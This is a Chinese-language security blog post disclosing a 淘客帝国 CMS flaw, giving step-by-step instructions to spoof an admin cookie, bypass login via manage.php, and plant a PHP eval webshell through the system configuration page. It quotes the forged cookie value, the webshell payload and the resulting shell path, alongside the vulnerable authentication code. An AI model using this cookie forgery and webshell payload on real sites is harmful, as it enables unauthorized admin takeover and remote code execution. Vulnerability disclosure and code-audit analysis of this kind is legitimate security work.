您的位置 » 首页 » 代码审计,实用工具 » 漏洞播报:淘客帝国cms系统后台cookie欺骗漏洞及后台拿shell

漏洞播报:淘客帝国cms系统后台cookie欺骗漏洞及后台拿shell

发表于4年前 | 作者: seay | 分类: 代码审计, 实用工具 | 孵化于:2012年11月29日 | 文章热度:8,983 次 全屏阅读

显示不全请点击全屏阅读

偶然发现的淘客帝国免费版的后台可以cookie欺骗

工具: 老兵的cookie’欺骗工具
关键字: 分类- 商城- 品牌- 女人- 男人- 美容- 鞋包- 数码- 居家- 食品

首先打开工具把cookie改为 COOKIEadminuser=admin; DedeUserID=1; PHPSESSID=11111 ,然后再工具的地址栏那里输入网站的后台(默认后台/admin)等页面全部出来后再在后台目录后加上manage.php 跳转就可以进入后台了,进入后台后怎么样拿shell就简单了,这里就不说了..

补下代码【anfli 补】
getshell 简单 系统配置 {${@eval($_POST[‘cmd’])}} 一句话连接地址/data/configdata.php
顺便补一下代码===================|The End}

##admin目录下php 部验证##
——————–main.php
<?php
require_once ‘../include/adminfunction.php’;
checkadmin();
———————/include/sysfunction.php
#####
 
function checkadmin(){
global $COOKIEadminuser;
global $sitetitleurl;
//判断
if( (isset($_COOKIE[‘COOKIEadminuser’]) && $_COOKIE[‘COOKIEadminuser’]!=””) || (isset($_SESSION[‘adminuser’]) && $_SESSION[‘adminuser’]!=””) ){
} else {
echo(“<script language=’JavaScript’>;top.location.href='”.$sitetitleurl.”‘;</script&gt;”);
exit;
}
 
一看就懂
$_COOKIE[‘COOKIEadminuser’]!=”” 只要不为空就ok
//index.php 一看到这里就知道 程序员自己催眠了自己 登出就把adminuser 清空 ………COOKIEadminuser是干神马的?

/admin/index.php 是不会通过验证 但是如果访问/admin/manage.php 的话一样ok 也就lz所谓的偶然发现了 COOKIEadminuser 并没有空

if($action==”loginout”){
$_SESSION[‘adminuser’] = “”;
SetCookie(“adminuser”, “”);
redirect_to($sitetitleurl);

其实所有审计过程 是倒序

Tags:

帝国CMS漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/1781/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有2个筒子的人留下了脚印...

  • 幽鬼狼魂 说:
    1楼
    2012 年 11 月 30 日 上午 12:49 回复

    很多做开发的好像和做安全的是两个世界的人。。 ➡

    • 【管理员】seay 说:
      2012 年 11 月 30 日 上午 8:37 回复

      俺也觉得

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)